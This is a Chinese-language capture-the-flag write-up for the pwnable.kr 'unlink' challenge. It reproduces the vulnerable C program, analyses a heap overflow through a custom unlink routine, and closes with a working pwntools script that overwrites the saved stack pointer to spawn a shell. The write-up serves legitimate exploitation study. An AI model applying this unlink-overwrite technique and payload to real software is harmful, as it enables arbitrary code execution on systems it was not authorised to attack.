pwnable.kr 第一阶段的最后一题!
这道题目就是堆溢出的经典利用题目,不过是把堆块的分配与释放操作用C++重新写了一遍,可参考《C和C++安全编码一书》//不是广告
#include <stdio.h> #include <stdlib.h> #include <string.h> typedef struct tagOBJ{ struct tagOBJ* fd; struct tagOBJ* bk; char buf[8]; }OBJ; void shell(){ system("/bin/sh"); } void unlink(OBJ* P){ OBJ* BK; OBJ* FD; BK=P->bk; FD=P->fd; FD->bk=BK; BK->fd=FD; } int main(int argc, char* argv[]){ malloc(1024); OBJ* A = (OBJ*)malloc(sizeof(OBJ)); OBJ* B = (OBJ*)malloc(sizeof(OBJ)); OBJ* C = (OBJ*)malloc(sizeof(OBJ)); // double linked list: A <-> B <-> C A->fd = B; B->bk = A; B->fd = C; C->bk = B; printf("here is stack address leak: %p\n", &A); printf("here is heap address leak: %p\n", A); printf("now that you have leaks, get shell!\n"); // heap overflow! gets(A->buf); // exploit this unlink! unlink(B); return 0; }
这道题在get(A->buf)处存在明显的堆溢出,可以覆盖A->buf以后全部堆内存。
首先在gets(A->buf)后,执行了unlink操作,操作导致[B->bk]->fd被B->fd值覆写以及[B->fd]->bk被B->bk覆写。
该覆写过程发生于Unlink函数中,当输入A->buf溢出覆盖了B->fd和B->bk时,可导致一个DWORD SHOOT覆写。但会产生另外一个DWORD被覆盖的副作用。
1. 最初的想法通过上述的DWORD SHOOT覆写Unlink函数的返回地址,将该返回地址改为shell函数的返回地址。可能导致在Unlink返回时跳转到shell函数去
即:
B->bk = Unlink的返回地址
B->bk = Shell函数的起始地址
根据覆写流程,会产生一个副作用,即[Shell函数的起始地址+4 ] = Unlink的返回地址
当该副作用产生时,shell函数内容会被篡改,导致出错该方案行不通。
2. 第二种考虑将shellcode写在溢出的堆上,同样利用上述方法,将返回地址写到堆上的地址,然后再使用跳转,至shell函数中以获得flag。
堆内存即
A结构+B->fd+B->bk+nop*n + jmp shell + jmp short xxx
其中返回地址覆写为jmp short xxx,这样Unlink结束后跳转至jmp short xx指令,jmp短跳转至nop然后再jmp shell导致获取权限。
这样覆写位置在jmp short xx指令后,对执行函数无影响,方案貌似可行。
这时存在的问题是需要在堆上执行代码,需要堆上的数据有执行权限。查看一下开启的保护:
发现开启了NX保护,堆上代码不可执行,因此该方案也无效。
3. 最终,无可奈何只能继续往下面找,发现unlink函数没有可以利用的地方了,然后main函数直接结束了,也没有给出之前做过的覆写GOT表的机会。
最终在main函数返回时找到可以利用的地方。
retn指令相当于pop eip,该指令是可以控制程序运行流程的,流程的来源是esp指向的地址。
而再之前 lea esp,[ecx-4]即把ecx-4地址中的数据赋给esp。
而在此逆推ecx的值是从mov ecx,[ebp-4]中得到的。
而leave指令相当于mov esp ebp,pop ebp,对esp数据的来源无影响。
ebp在整个main函数运行中是不变的。
因此,可以构造 [ecx-4] = shell的起始地址
这样 就可以先把 shell的起始地址写到一个内存地址(如可以在A->buf的起始部分输入shell函数地址),ecx再指向该地址+4.
进一步就是将ebp-4地址中的值覆写成上面的地址+4.
======================思路over===========================================
因此输入的内容就是shell地址+填充字符 + B->fb + B->bk就可以了。
根据前一篇文中堆块的地址分配,malloc(sizeof(OBJ)的大小就应该是8 * (int(4+4+8 + 4)/8 +1) = 24
A->buf = 12,再加上B堆块固有的堆块大小及标志位4字节,shell+填充字符共计为16字节。
假设A->buf的地址记为shell,shell = A+8
下一步要解决的是B->fb和B->bk问题。
BK=B->bk;
FD=B->fd;
FD->bk=BK;
BK->fd=FD;
由OBJ结构可知OBJ->fb = OBJ,OBJ->bk=OBJ+4.
所以,覆写就有两种覆写方法,BK为shell+4,或者BK为EBP-4
当BK= shell+4 时,FD + 4 = EBP-4,FD=EBP-8 , 覆写时,[shell + 4 ] = EBP-8
当BK = EBP-4时,FD + 4 = shell +4 ,FD = shell, 覆写时,[shell+4] = EBP-4
二者的覆写均无影响。
再说,shell的值与EBP的值如何获得。
shell = A + 8,A可由打印的第二个值获得。
而EBP可由反汇编代码中看到,
&A= EBP-0x14
由上述两种方法求得的fb、bk分别
1.
payload += p32(heap_addr + 12)
payload += p32(stack_addr + 0x10)
2.
payload += p32(stack_addr + 12)
payload += p32(heap_addr + 12 )
编写payload脚本
from pwn import * shell_addr = 0x080484eb s = ssh(host='pwnable.kr', port=2222, user='unlink', password='guest' ) p = s.process("./unlink") p.recvuntil("here is stack address leak: ") stack_addr = p.recv(10) stack_addr = int(stack_addr,16) p.recvuntil("here is heap address leak: ") heap_addr = p.recv(9) heap_addr = int(heap_addr,16) payload = p32(shell_addr) payload += 'a'*12 #payload += p32(heap_addr + 12) #payload += p32(stack_addr + 0x10) payload += p32(stack_addr + 12) payload += p32(heap_addr + 12 ) p.send(payload) p.interactive()
